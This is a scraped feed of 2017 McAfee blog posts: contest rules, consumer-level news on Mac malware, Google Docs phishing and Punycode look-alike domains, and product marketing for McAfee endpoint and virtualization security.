Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card!

From May 8th-11th we’ll share “Two Truths and a Lie” posts on @McAfee. Your job is to reply to us with which answer you think is the lie. Once you tweet us your correct answer, you’ll be automatically entered to win a $100 Amazon Gift card! After the contest, we will select 4 winners who tweeted the correct answer, and notify them via direct message.

So head over to twitter to catch the “Misaligned Lie” (and if you haven’t already read our Misaligned Incentives Report and study up)!

For full contest details please see the Terms and Conditions below:

 Misaligned Incentives “Two Truths and a Lie” Contest

  1.   How to enter:

No purchase necessary. A purchase will not increase your chances of winning. McAfee Misaligned Incentives “Two Truths and a Lie” Contest Terms and Conditions will be conducted during one week, each day being the start of a new entry period. All entries for each day of the Misaligned Incentives “Two Truths and a Lie” Contest must be received during the time period allotted for that Misaligned Incentives “Two Truths and a Lie” Contest. Pacific Daylight Time shall control the Misaligned Incentives “Two Truths and a Lie” Contest. One winner will be chosen after the four days of the Misaligned Incentives “Two Truths and a Lie” Contest. The Misaligned Incentives “Two Truths and a Lie” Contest is as follows:

Misaligned Incentives “Two Truths and a Lie” Contest – One Week 4 Winners

  • Monday, May 8th 9am –  Friday, May 12th 6pm PST
    • 5 winners announced Monday, May 15th @ 3pm PST

On each of the days listed above, there will be 1 tweet from @McAfee with a sharecard for participates to reply to.

For each Misaligned Incentives “Two Truths and a Lie” Contest, participants must complete the following steps during the time allotted for the Misaligned Incentives “Two Truths and a Lie” Contest:

  1. Reply to the @McAfee or Social Reply Contest tweet with the correct “lie.”
  2. Your answer must be in the form of a reply to @McAfee in order to be successfully submitted.

Four winners will be chosen for the Misaligned Incentives “Two Truths and a Lie” Contest from the viable pool of entries that replied to the correct tweet. McAfee (“Sponsor”) and its McAfee social team will randomly choose a winner eligible and correct entries. The winners of each day will be announced by 3:00pm PDT on Monday, May 15th on the @McAfee  twitter handle.  No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per contest. Participants are only eligible to win one day of the five days.  

  1.   Eligibility:

The Misaligned Incentives “Two Truths and a Lie” Contest is open to all people who are 18 years of age or older on the date the Misaligned Incentives “Two Truths and a Lie” Contest begins and live in a jurisdiction where this prize and Misaligned Incentives “Two Truths and a Lie” Contest are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection: 

Five (5) total winners, will be selected from the eligible entries received during each of the Misaligned Incentives “Two Truths and a Lie” Contest periods. By participating, entrants agree to be bound by the Official Misaligned Incentives “Two Truths and a Lie” Contest and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com at or around 3:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1.   Prizes: 

The prize for each Misaligned Incentives “Two Truths and a Lie” Contest is a $100 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1.   General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Misaligned Incentives “Two Truths and a Lie” Contest, or by any technical or human error, which may occur in the processing of the Misaligned Incentives “Two Truths and a Lie” Contest entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the Misaligned Incentives “Two Truths and a Lie” Contest, any prize won, any misuse or malfunction of any prize awarded, participation in any Misaligned Incentives “Two Truths and a Lie” Contest-related activity, or participation in the Misaligned Incentives “Two Truths and a Lie” Contest. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases:

By entering the Contest, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Contest or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE CONTEST OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE CONTEST OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  1. Use of Use of Winner’s Name, Likeness, etc.:Except where prohibited by law, entry into the Contest constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list).  As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation.  By entering this Contest, you consent to being contacted by Sponsor for any purpose in connection with this Contest.

Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize Misaligned Incentives “Two Truths and a Lie” Contest rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each Misaligned Incentives “Two Truths and a Lie” Contest.

Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law &  Disputes:

EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS CONTEST OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy:

Personal information obtained in connection with this prize Misaligned Incentives “Two Truths and a Lie” Contest will be handled in accordance policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 12th2017 and before May 11th 2018 to the address listed below, Attn: Misaligned Incentives “Two Truths and a Lie” Contest.  To obtain a copy of these Official Rules, send a stamped, self-addressed business-size envelope to the address listed in below, Attn: Margie Easter.  VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Contest and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd.Santa Clara, CA 95054 USA

 

The post Can You Spot the “Misaligned Lie?” Contest Terms and Conditions appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/feed/ 0
New Mac Malware Manages to Spy on Encrypted Browser Traffic https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/ https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/#respond Thu, 04 May 2017 19:00:56 +0000 https://securingtomorrow.mcafee.com/?p=73462 This blog was written by Douglas McKee. There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing. How does […]

The post New Mac Malware Manages to Spy on Encrypted Browser Traffic appeared first on McAfee Blogs.

]]>
This blog was written by Douglas McKee.

There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing.

How does this attack work?

First, the Trojan is digitally signed with a previously valid Apple certificate. It initially relies on social engineering, first phishing for credentials through either email or by displaying a full-screen alert that claims there’s an urgent OS X update waiting to be installed. Once it gets access, the Trojan makes the necessary changes it needs to infiltrate the user’s browsing activity.

It elevates the privileges of the current user to a permanent administrator and bypasses additional password prompts, keeping the rest of the infection process quiet. DoK also replaces existing login entries with its own so it runs when the user logs onto the computer. Then, it redirects all traffic to the Dark Web through a malicious proxy server and installs its own root certificate on the machine. From there, the attacker can carry out a man-in-the-middle attack and decrypt the user’s HTTPS traffic by pretending to be whichever website the victim attempts to access.

Since browsers typically alert users of compromised website connections, how are they not catching this attack? Because of the bad root certificate.

How do you protect yourself?

Apple mitigated the risk by revoking the certificate used in the attack. But there’s still more you can do to protect yourself from this attack and others like it.

NEVER open attachments or click on links from unknown senders. Also, check the source of the email and ensure legitimacy. Always be cautious whenever you’re asked to provide credentials.

Whenever possible, Apple users should only install apps from the Apple app store to ensure they’re only using applications that Apple has screened and approved.

To learn more about this cyberattack and others like it, make sure to follow @McAfee and @McAfee_Business.

The post New Mac Malware Manages to Spy on Encrypted Browser Traffic appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/feed/ 0
Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/ https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/#respond Wed, 03 May 2017 23:02:50 +0000 https://securingtomorrow.mcafee.com/?p=73406 Practically everyone uses Google Docs—you can collaborate with coworkers and friends, sharing any information you want to in real-time. Now, a new cyberattack has emerged in which a Google doc phishing link is sent a victim, hoping they click it and infect themselves with malware. But here’s the catch—this nasty malware manages to mask itself […]

The post Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast appeared first on McAfee Blogs.

]]>
Practically everyone uses Google Docs—you can collaborate with coworkers and friends, sharing any information you want to in real-time. Now, a new cyberattack has emerged in which a Google doc phishing link is sent a victim, hoping they click it and infect themselves with malware. But here’s the catch—this nasty malware manages to mask itself as a sender who is a familiar face to the victim. And unfortunately, is pretty convincing.

This phishing scam has hit Gmail inboxes everywhere today. And, leveraging a common social engineering technique, it looks exactly like an email from a friend would. Here’s a screenshot of what the message looks like in a victim’s inbox, as provided by Fortune:

 

 

So, what happens if you click on the malicious link in your inbox? First, you arrive at a login screen that looks almost identical to the same screen you’d see if someone actually invited you to a Google Doc. It lists your Google Accounts, and it even reflects Google’s recent redesign. What’s worse—the page manages to resemble a very realistic Google.com URL and clicking on the link appears to confirm the page’s legitimacy.

Then, that page invites you to choose which account you’d like to use to view the Google Doc, and you’re taken to a page that invites you to grant access to your Google Account. Basically, you’ve just given the cybercriminal launching the attack gains access into your entire Gmail account.

Beyond social engineering its victims, this attack’s success is dependent on a flaw in Google’s security design. The page that lists the apps with access to your Gmail count isn’t able to distinguish between apps that are made by Google and apps that aren’t.

Fortunately, Google has already responded to the incident and plugged holes. As a spokesperson stated, “We have taken action to protect users against an email spam campaign impersonating Google Docs, which affected fewer than 0.1% of Gmail users. We protected users from this attack through a combination of automatic and manual actions, including removing the fake pages and applications, and pushing updates through Safe Browsing, Gmail, and other anti-abuse systems.” Regarding the extent of damage done to that .1%, the spokesperson said, “While contact information was accessed and used by the campaign, our investigations show that no other data was exposed.”

Additionally, the tech giant responded to the attack by releasing a new security feature for Gmail on Android that warns users when they click on a suspicious link in an email.

So, what happens if you’re sent a questionable link from a “friend” today? The good news is this phishing email has been consistently addressed to “hhhhhhhhhhhhhh,” so clearly you can identify the attack that way. And if you do in fact receive this scam, do not click the link.

Clicking on links from your email is highly risky. McAfee chief scientist Raj Samani warns, “Phishing attacks remain the most common method of manipulating individuals into clicking on links and ultimately installing malicious content onto their systems.”

Samani suggests being aware of the emails that you’re expecting and we wary of every unexpected email. “Go straight to the source through a different communication channel if you receive a link you were not expecting. Also, hover over links to see if it is a reliable URL. Or search online for other instances of this campaign and what those instances could tell you about the email’s legitimacy.”

Then, delete suspicious emails entirely. In the case of this scam, make sure to report receiving it to Google as they’ve requested (see below).

Unfortunately, though there has been some speculation, it is yet to be determined who is responsible for this attack.

To gain further insight on how to protect yourself from phishing scams like this and to stay up-to-date on all cybersecurity news, make sure to follow @McAfee and @McAfee_Business.

The post Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/heads-massive-google-doc-phishing-scam-hit-scene-spreading-fast/feed/ 0
MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment Part 2 https://securingtomorrow.mcafee.com/business/move-your-way-choosing-between-agentless-and-multiplatform-deployment-part-2/ https://securingtomorrow.mcafee.com/business/move-your-way-choosing-between-agentless-and-multiplatform-deployment-part-2/#respond Mon, 01 May 2017 15:00:04 +0000 https://securingtomorrow.mcafee.com/?p=71667 This blog post was written by Teresa Wingfield. It’s been more than a year since we last shared some of the key difference between McAfee MOVE AntiVirus in multiplatform and agentless deployments. For a recap, please review our initial blog, MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment. The list has grown over the […]

The post MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment Part 2 appeared first on McAfee Blogs.

]]>
This blog post was written by Teresa Wingfield.

It’s been more than a year since we last shared some of the key difference between McAfee MOVE AntiVirus in multiplatform and agentless deployments. For a recap, please review our initial blog, MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment. The list has grown over the past year.

What’s New?

Please see the table below for our most recent comparison. Multiplatform deployment now supports integration with McAfee Threat Intelligence Exchange and elastic provisioning of offline scanners. Agentless deployment protects Windows and Linux virtual machines while multiplatform deployment supports Windows.

McAfee Threat Intelligence Exchange Integration

McAfee MOVE AntiVirus leverages McAfee Threat Intelligence Exchange to share intelligence across servers and networks in multiplatform deployments. Let’s look at an example of how this capability makes server and network security work smarter together:

  1. McAfee Network Security Platform (NSP) inspects north-south & east-west traffic for network threats and discovers a file with an unknown reputation.
  2. NSP uses McAfee Advanced Threat Defense to test the file for malware in a sandbox.
  3. Advanced Threat Defense detects malware and notifies Threat Intelligence Exchange.
  4. Based on the updated Threat Intelligence Exchange reputation, McAfee MOVE AntiVirus cleans the malware from all impacted systems.

Security Virtual Machine Auto Scaling

McAfee MOVE AntiVirus uses offline scan servers called security virtual machines (SVMs) to avoid impacting the performance of virtual machines. McAfee MOVE AntiVirus auto-scales these SVMs in multiplatform deployments, meaning that SVMs can automatically be scaled up and down depending on the number of virtual machines and virtual desktops. This leads to more efficient use of resources and greater scale during antivirus scan storms.

Virtual Machine Protection

Agentless deployments protect Linux and Windows virtual machines while multiplatform deployments protect Windows virtual machines. For more details on our extensive list of supported operating systems and other requirements, please check out McAfee MOVE AntiVirus System Requirements.

Learn More

McAfee MOVE AntiVirus is sold standalone and is part of our hybrid cloud server security suites. Here’s where you can get additional information:

McAfee Server Security Suite Essentials

McAfee Server Security Suite Advanced

McAfee MOVE AntiVirus

 

The post MOVE Your Way: Choosing Between Agentless and Multiplatform Deployment Part 2 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/move-your-way-choosing-between-agentless-and-multiplatform-deployment-part-2/feed/ 0
This Tricky Phishing Scam Manages to Impersonate Legitimate URLS https://securingtomorrow.mcafee.com/business/tricky-phishing-scam-manages-impersonate-legitimate-urls/ https://securingtomorrow.mcafee.com/business/tricky-phishing-scam-manages-impersonate-legitimate-urls/#respond Thu, 27 Apr 2017 21:34:35 +0000 https://securingtomorrow.mcafee.com/?p=73132 This post was written by Adam Wosotowsky. This past week, a new web-based phishing scam has emerged that manages to sneakily impersonate legitimate URLs. You heard correctly – this cyberthreat manages to appear to as a secure, trusted website, one such example being apple.com. The deceiving type of attack can be classified as a homograph attack, […]

The post This Tricky Phishing Scam Manages to Impersonate Legitimate URLS appeared first on McAfee Blogs.

]]>
This post was written by Adam Wosotowsky.

This past week, a new web-based phishing scam has emerged that manages to sneakily impersonate legitimate URLs. You heard correctly – this cyberthreat manages to appear to as a secure, trusted website, one such example being apple.com. The deceiving type of attack can be classified as a homograph attack, and it’s extremely challenging to detect.

How We Got Here

This misdirection attack, while not new, is an excellent demonstration of the secondary problems associated with internationalization and support for a unified multi-language architecture across core internet protocols. Many core internet services operate on a strictly limited character set called ASCII, which was developed nearly 60 years ago at the birth of interconnected computers or, in this case, automated telegraph machines. Today, it is basically the available characters on a modern English keyboard.

Over time, programmers developed new character sets to allow users from all over the world to read/write in their native languages. This development increased access for users everywhere, but required supporting long lists of different character sets to display each language correctly. To manage this, they developed a new character set named Unicode, which unified all character sets under one flexible standard.

The core services and protocols that run the internet, including DNS (hostname resolution) and SMTP headers (email), process ASCII content at their cores. This maintains functional backward compatibility with new protocol standards on legacy installs as well as facilitates code security by limiting the scope of legitimate inputs. To bridge the gap between Unicode and ASCII, an ASCII encoding of Unicode called “Punycode” was developed. Punycode allows a full array of characters from other languages to be displayed in an email’s “From” and “Subject” headers and for domain names to be displayed by your browser as their intended character set, even though the domain name from the DNS perspective is plain ASCII.

How the Attack Works

The mechanism for the lookalike domain attack uses a Punycode-encoded domain with foreign letters that look just like English letters so that your browser interprets the domain to be visually identical to the domain you are expecting. As seen in this example from Xudong Zheng, this was “apple” using five encoded letters, which allows a domain to completely look like “apple.com” in the content, in the mouseover, and in the browser window—even though the domain itself is actually https://www.xn--80ak6aa92e.com. With the addition of a trusted website certificate to authenticate https://www.xn--80ak6aa92e.com, someone browsing to the site would even see a valid padlock. Keep in mind that your browser knows and works with the ASCII domain name, so it just shows you the translation.

The danger of this type of misdirection is obvious: a phishing email or link in a forum or social network could send unsuspecting victims to a malicious website that could attempt to steal your identity by asking for credentials or push malware through a drive-by download.

There would be little or no warning for the average user who runs a fully featured browser. What’s more– this problem is going to be even worse on tablets or cellphones where you don’t have a mouseover and you just click things by touching them. It’s realistic to expect to see this technique used in the “Android security update” scam, where legitimate affiliate advertising networks are used to push apocalyptic warnings about infection unless you install this “security update” and infect yourself.

Mitigating the Risk

Our advice: NEVER install an app from anywhere outside of your official vendor supplied app store. Also, much like having anti-virus and keeping it up-to-date, practice good security habits, like using a web filter plugin on your browser.

Also, while this attack does seem dangerous, there are a few things that are working against it and can prevent the technique from seeing a mass adoption in the wild:

  1. With the media attention, browsers are looking for a middle-ground to make users more aware of the actual ASCII domain name, in addition to the Punycode interpreted version. How this works itself into cellphone browsing with its high cost of screen real estate remains to be seen.
  2. This technique requires the purposeful registration of a malicious domain (as opposed to a compromised domain). And there are many pro-spamming organizations actively work against internet security by supporting anonymous domain registration—often preventing the culprit from being positively identified and prosecuted without enormous international cooperation and effort. However, there is often a pattern to purposely registered abusive domains that can be used to aggressively block them once seen. There are certainly many phishing/malware groups that rely on purposely registered domains, but many of the most effective campaigns use compromised domains knowing they will be blocked quickly (by anti-abuse researchers) and tossed away.
  3. The domain is still a domain, and domain reputation components of web filters and email scanners work effectively on many phishing attacks. Those tools still apply and are not hampered by odd looking domain names.

Make sure you stay up-to-date on all cybersecurity news by following @McAfee or @McAfee_Business.

The post This Tricky Phishing Scam Manages to Impersonate Legitimate URLS appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/tricky-phishing-scam-manages-impersonate-legitimate-urls/feed/ 0
Why Migrate to McAfee ENS? https://securingtomorrow.mcafee.com/business/migrate-mcafee-ens/ https://securingtomorrow.mcafee.com/business/migrate-mcafee-ens/#respond Thu, 27 Apr 2017 14:00:05 +0000 https://securingtomorrow.mcafee.com/?p=71760 What are you waiting for? If you haven’t already made plans to migrate to McAfee Endpoint Security (ENS) soon, you should. But don’t just take our word for it. See what other McAfee customers say below about why they migrated their endpoint protection to McAfee ENS and what types of benefits they are experiencing. Their […]

The post Why Migrate to McAfee ENS? appeared first on McAfee Blogs.

]]>
What are you waiting for? If you haven’t already made plans to migrate to McAfee Endpoint Security (ENS) soon, you should. But don’t just take our word for it.

See what other McAfee customers say below about why they migrated their endpoint protection to McAfee ENS and what types of benefits they are experiencing. Their main reasons for migrating vary but generally fall into four categories: better performance and user experience, easier management and administrative time savings, improved threat protection, and better positioning for the future.

Better Performance and User Experience

“When we started deploying [McAfee] ENS to our customers, the calls on our scan day stopped…The customer experience, which is really our end game, has just been dramatically improved. We can take problematic users or users that have impacts from the old legacy scans and each one of them comes out [of the migration to ENS] with a positive comment and a positive experience.”

– Chris T., Security Engineer, Large Insurance Company

“[McAfee ENS] has improved the computing experience of our end users. [It] takes less resources to run and is less interfering with normal business operations …we are very happy with it.”

–  Harry Folloder, Chief Information Officer, Advantage Waypoint

“[Why did we migrate?] Primarily performance. [McAfee] Endpoint 10 has been heavily marketed as being a lot faster… Our testing definitely validated that is was a lot faster.”

–  Dwayne Cyr, Senior Cyber Security Manager, Textron

 “My phone used to ring off the hook on Tuesdays [full scan day] and now it doesn’t.

–  Mehdi Harandi, Desktop Security Manager, Fairfax County Public Schools

 

Easier Management and Administrative Time Savings      

“There were quite a few instances in our environment of ransomware that no longer exist. I’d say that’s easily 40 hours [saved] every two weeks.”

–  Edwin Drayden, Director of IT Infrastructure, HollyFrontier

“What I love about McAfee is the protect-detect-correct strategy… [That strategy] works out smoothly in the latest version [10.5] of McAfee Endpoint Security. …Within three clicks, you can find the [infected] system, investigate the system, and respond. [McAfee ENS] saves a lot of administrative time.”

–  Niels Benders, Infrastructure Architect, CGI

“What I like best about McAfee ENS so far is that it is both stronger and lighter. By that I mean it has superior detection and prevention technology that protects us better against present and future threats, but it is also easier to manage. Both aspects are equally important.”

–  Philippe Maquoi, Head of Endpoint and Server Security, Service Public de Wallonie

“We were just blown away by the intricate detail of the user experience, from the end user computing side but also from the admin side. [McAfee ENS is] making it easier for us to manage the endpoint and take corrective action.

–  Harry Folloder, Chief Information Officer, Advantage Waypoint

“[McAfee] ENS represented a consolidated footprint, made our management much easier to control… The overall performance by consolidating the tools has been rather dramatic.

–  Chris T., Security Engineer, Large Insurance Company

“…But with McAfee Endpoint Security, I was able to find exactly which module was causing the issue, temporarily disable just that module, and find the conflict within less than one hour. In the past, finding such a conflict could easily have taken eight to 20 hours. … With McAfee Endpoint Security, I set it up once and then can forget about it 99 percent of the time…Management doesn’t have to hear about endpoint security at all.”

–  Mehdi Harandi, Desktop Security Manager, Fairfax County Public Schools

“The modular software blade design…As an administrator, that’s very useful.. [It] adds a lot of flexibility. The technology behind [McAfee ENS] is very solid.”

–  Scott M., Security Engineer, Large Healthcare Company

 

Improved Threat Protection

“McAfee ENS is smart enough to stop threats without us having to manually create a bunch of rules, as we had to do in the past. Also, instead of having to push out and update multiple agents for various aspects of protection—a HIPS agent, a web content control agent, and so on—booting and rebooting each time, with ENS we have a stronger tool set, encompassed in one product, with just one agent to deal with.”

–  Philippe Maquoi, Head of Endpoint and Server Security, Service Public de Wallonie

“We looked at all the features and benefits [of McAfee ENS]. My staff feels more comfortable with the security that it provides their teams and those we are charged with protecting.”

–  Harry Folloder, Chief Information Officer, Advantage Waypoint

“[We migrated] to get a quality product and watch it attach upstream to everything else… [Once deployed] I felt better; I could sleep at night, because I knew that [McAfee] ENS works… It’s been pretty quiet ever since, [across] literally every single endpoint in the whole infrastructure.”

–  Edwin Drayden, Director of IT Infrastructure, HollyFrontier

“We haven’t had a CryptoLocker outbreak in six months. With McAfee Endpoint Security, we have more visibility, more coverage, and more customer confidence than we have had in 12 years.

—Simon Sigré, Senior Network Engineer, Catholic Education South Australia

 

Better Positioning for the Future

“McAfee Endpoint Security is, to use an overused but apt term, ‘state of the art.’ It represents the next evolution of endpoint protection. It’s more stable, more efficient, and more accurate. It is definitely worth migrating to.”

–  Chris T., Security Engineer, Large Insurance Company

“With McAfee Endpoint Security, we now have endpoint protection that positions us well for the future.”

–  Mehdi Harandi, Desktop Security Manager, Fairfax County Public Schools

“[McAfee] ENS 10.5 looks like it is going to be amazing. It reflects a long-term vision of how to address endpoint protection.”

–  Scott M., Large Healthcare Company

 

Watch below to see and hear firsthand from McAfee customers why they migrated to McAfee ENS.

Get your questions answered by tweeting @McAfee_Business.

The post Why Migrate to McAfee ENS? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/migrate-mcafee-ens/feed/ 0
Take the Misaligned #IncentiveQuiz and Win BIG https://securingtomorrow.mcafee.com/business/take-misaligned-incentivequiz-win-big/ https://securingtomorrow.mcafee.com/business/take-misaligned-incentivequiz-win-big/#comments Wed, 26 Apr 2017 22:22:09 +0000 https://securingtomorrow.mcafee.com/?p=71859 Between the infamous ‘Black Hats’ and crusading ‘White Hats,’ fighting cybercrime can feel like a game of cat and mouse. These days, Black Hats always appear one step ahead of the do gooder White Hats. It’s a never-ending back and forth. But what makes each side tick? Test your knowledge of Black and White Hat […]

The post Take the Misaligned #IncentiveQuiz and Win BIG appeared first on McAfee Blogs.

]]>
Between the infamous ‘Black Hats’ and crusading ‘White Hats,’ fighting cybercrime can feel like a game of cat and mouse. These days, Black Hats always appear one step ahead of the do gooder White Hats. It’s a never-ending back and forth. But what makes each side tick? Test your knowledge of Black and White Hat incentives with our latest #IncentiveQuiz. Learn for yourself what drives Black Hats to crime, and see what White Hat incentives lack.

Need an incentive?

To ensure we practice what we preach, make sure to share your results via Twitter for your chance to win a $50 Amazon Gift Card! Details below, terms apply. And don’t forget to read the Misaligned Incentives report. You can download it here.

Note: There is a widget embedded within this post, please visit the site to participate in this post's widget.

Share your results on Twitter, by tagging @McAfee and using #IncentiveQuiz and #sweepstakes for your chance to win a $50 Amazon Gift card. Terms and conditions apply.

The post Take the Misaligned #IncentiveQuiz and Win BIG appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/take-misaligned-incentivequiz-win-big/feed/ 2
Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! Terms & Conditions https://securingtomorrow.mcafee.com/business/test-your-knowledge-with-the-misaligned-incentivequiz-sweepstakes-terms-conditions/ https://securingtomorrow.mcafee.com/business/test-your-knowledge-with-the-misaligned-incentivequiz-sweepstakes-terms-conditions/#respond Wed, 26 Apr 2017 17:00:39 +0000 https://securingtomorrow.mcafee.com/?p=73037 Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! And enter for the chance to Win a $50 Amazon Gift Card by sharing your results! Think you know the difference between the infamous ‘Black Hats’ and crusading ‘White Hats?’ Well, the Misaligned Incentives Report is out and we want to test your knowledge! Find out by […]

The post Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! Terms & Conditions appeared first on McAfee Blogs.

]]>
Test Your Knowledge with the Misaligned #IncentiveQuiz Sweepstakes! And enter for the chance to Win a $50 Amazon Gift Card by sharing your results!

Think you know the difference between the infamous ‘Black Hats’ and crusading ‘White Hats?’ Well, the Misaligned Incentives Report is out and we want to test your knowledge! Find out by taking our Misaligned Incentive Quiz and share your results on social media where you’ll be entered into a drawing fora $50 Amazon gift card!

How to Win:

After you read the Misaligned Incentive report, test your knowledge with our Misaligned #IncentiveQuiz Sweepstakes! Once completed share your results on Twitter and tag @McAfee, #IncentiveQuiz and #Sweepstakes for a chance at a $50 Amazon Gift card. Four total winners will be selected.  One on Monday, May 1st and one on Monday, May 8th.  Winners will be posted on Twitter and notified by direct message. Make sure you follow @McAfee and @McAfee_Business to see who won!

For full Sweepstakes details, please see the Terms and Conditions below:

McAfee Misaligned #IncentiveQuiz Sweepstakes Terms and Conditions

1. How to enter: 

